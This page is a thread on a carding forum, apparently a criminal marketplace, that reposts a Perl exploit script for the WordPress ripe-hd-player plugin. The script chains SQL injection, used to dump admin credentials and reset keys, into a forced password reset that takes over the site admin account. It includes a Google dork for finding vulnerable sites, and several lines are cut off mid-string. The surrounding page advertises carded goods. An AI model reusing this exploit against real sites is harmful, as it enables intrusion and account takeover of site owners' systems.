We are closing registration and public forum view to Paid & Private in 16 days! CLICK HERE to register FREE.
 
Create an account  

For users privacy, our last domains: CarderHack.com and OmertaHack.net are moved to CardingTeam.ws

Deposit & Withdraw | About Verified Sellers and Escrow | Advertise | Scam Report | Tracking Number Details | ICQ: 717039384

carding forums carding forums
carding forums carding forums
carding forums Paid adv expire in 48 days
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
 
Wordpress HD-Player 0day Exploit

#1
Code:
#1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
#0     _                   __           __       __                     1
#1   /' \            __  /'__`\        /\ \__  /'__`\                   0
#0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
#1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
#0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
#1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
#0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
#1                  \ \____/ >> Exploit database separated by exploit   0
#0                   \/___/          type (local, remote, DoS, etc.)    1
#1                                                                      1
#0  [+] Site            : 1337day.com                                   0
#1  [+] Support e-mail  : submit[at]1337day.com                         1
#0                                                                      0
#1               #########################################              1
#0               I'm Caddy-dz member from Inj3ct0r Team                 1
#1               #########################################              0
#0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
####
# Exploit Title: Wordpress hd-player 0day Exploit
# Author: Caddy-Dz
# Facebook Page: https://www.facebook.com/Algerian.Cyber.Army
# E-mail: islam_babia@hotmail.com
# Download : https://www.mediafire.com/?62orbd63loc6us0
# Category:: webapps
# Google Dork: inurl:"/wp-content/plugins/ripe-hd-player
# Security Risk: High
# Tested on: Ubuntu
####
#
# Greets : 1337day Team , Exploit-ID Team , Algerian Cyber Army Team , KedAns-Dz , Kalashincov3 , The Unknown , Fawzi C
# .. The Crazy 3D Team , Kha&mix , King Of Pirates , xDZx-Team ... and all algerian hackers .
#
# this was written for educational purpose only. use it at your own risk.
# author will be not responsible for any damage caused! user assumes all responsibility
# intended for authorized web application pentesting only!
#####################################################################################################
# >>> sqli vulnerability discovered in the same plugin and posted ; https://1337day.com/exploit/20199
# this exploit was written to develope this vulnerability to get full access of the wordpress script
# and bypassing the hash password into a constant password = caddy
#####################################################################################################
use IO:: Socket;
use LWP::Simple;
use LWP::UserAgent;
system( 'cls' );
system( 'color a' );
if ( @ARGV < 2)
{
print "[-]How To Use\n\n" ;
&help; exit ();
}
sub help()
{
print "[+] usage1 : perl $0 site.com / \n" ;
print "[+] usage2 : perl $0 site.com /path/ \n" ;
print "[+] Note ! : do not use (http://) and leave space between the host and (/) \n or the path like the exemple" ;
}
print "\n****************************************************\n" ;
print "\n*                coded by Caddy-Dz                 *\n" ;
print "\n*        email: islam_babia[at]hotmail.com         *\n" ;
print "\n* Fb Page: https://facebook.com/Algerian.Cyber.Army *\n" ;
print "\*****************************************************\n" ;
( $Target, $path ,$file_vuln , $sql_query ,) = @ARGV ;
my $file_vuln = "/wp-content/plugins/ripe-hd-player/config.php?id=-3" ;
my $sql_query = '+/**/UNION/**/+/**/SELECT/**/+1,2,concat(0x23,user_login,0x3a,user_pass,0x23),4,5,6,7,8,9,10,11,12,13
my $url = "http://" . $Target . $path . $file_vuln . $sql_query ;
print "\n wait!!! \n\n" ;
my $request = HTTP::Request->new(GET=> $url );
my $useragent = LWP::UserAgent->new();
$useragent ->timeout(10);
my $response = $useragent ->request( $request );
my ( $username , $password );
if ( $response ->is_success) {
my $res = $response ->content;
if ( $res =~ m/[ #](.*):(.*)[#]/g) {
( $username ,$password ) = ( $1 , $2 );
print "[+] username and password :\n\n$username:$password \n\n" ;
}
else { print "[-] Error, Fail to get admin login.\n\n" ; }
}
else { print "[-] Error, " . $response ->status_line. "\n\n" ;
}
my $activation = 'http://' . $Target . $path . 'wp-login.php?action=lostpassword' ;
sub post_url {
my ( $activation , $formref ) = @_ ;
my $ua = new LWP::UserAgent(timeout => 300);
$ua ->agent( 'perlproc/1.0' );
my $get = $ua ->post( $activation , $formref );
}
my %param = ( 'user_login' => $username , 'wp-submit' => 'Get New Password' ); # you must change the parametre "Get New
print post_url( $activation , \ %param );
my $sql_activation = "http://" . $Target . $path . "wp-content/plugins/ripe-hd-player/config.php?id=-3+/**/UNION/**/+/*
my $request3 = HTTP::Request->new(GET=> $sql_activation );
my $useragent = LWP::UserAgent->new();
$useragent ->timeout(10);
my $response2 = $useragent ->request( $request3 );
my ( $key );
if ( $response2 ->is_success) {
my $res2 = $response2 ->content;
if ( $res2 =~ m/[ #](.*)[#]/g) {
( $key) = ( $1 );
print "[+] user activation key : \n\n$key \n\n" ;
}
else { print "[-] Error, Fail to get user key.\n\n" ; }
}
else { print "[-] Error, " . $response ->status_line. "\n\n" ;
}
my $link2 = "http://" . $Target . $path . "wp-login.php?action=rp&key=" . $key . "&login=" . $username ;
use strict;
sub post_url {
my ( $link2 , $formref ) = @_ ;
my $ua2 = new LWP::UserAgent(timeout => 300);
$ua2 ->agent( 'perlproc/1.0' );
my $get2 = $ua2 ->post( $link2 , $formref );
if ( $get2 ->is_success ){
print "\nPassword bypassed and changed to => caddy \n" ;
} else {
print status_line;
}
}
my %param = ( 'pass1' => 'caddy' , 'pass2' => 'caddy' , 'wp-submit' => 'Reset Password' ); # you must change the parametr
print post_url( $link2 , \ %param );
# F2F77DA8172F8658   1337day.com [2013-07-30]   D97CD14F4A1FE01C #
Reply
Paid adv. expire in 31 days
CLICK to buy Advertisement !

    Verified & Trusted Thread-Verified-SELLING-Carded-iPhone-X-XS-Max-Samsung-MacBook-Laptops-TV




Forum Jump: